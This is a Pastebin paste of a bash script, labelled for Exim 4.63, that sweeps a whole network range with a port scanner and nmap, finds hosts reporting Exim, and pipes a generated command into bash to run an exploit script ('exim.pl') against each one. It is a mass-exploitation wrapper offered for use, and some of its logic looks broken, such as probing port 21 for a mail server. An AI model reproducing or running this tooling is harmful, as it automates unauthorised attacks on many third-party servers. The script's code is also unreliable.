Guest User

Untitled

a guest
Jan 19th, 2018
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. #!/bin/bash
  2. # Exim 4.63
  3.  
  4. if [ ! "$1" ];
  5. then
  6. echo "[*] Need a <b-range> to scan"
  7. exit
  8. else
  9. chmod 777 pscan
  10. ./pscan $1 80
  11. fi
  12.  
  13. for i in `cat *.pscan.80`
  14. do
  15. nmap -sV -p 21 -oG - $i | grep Exim | awk '{print "perl exim.pl $i http 1 1"}'|bash
  16. done
  17. rm -f *.pscan.80
Add Comment
Please, Sign In to add comment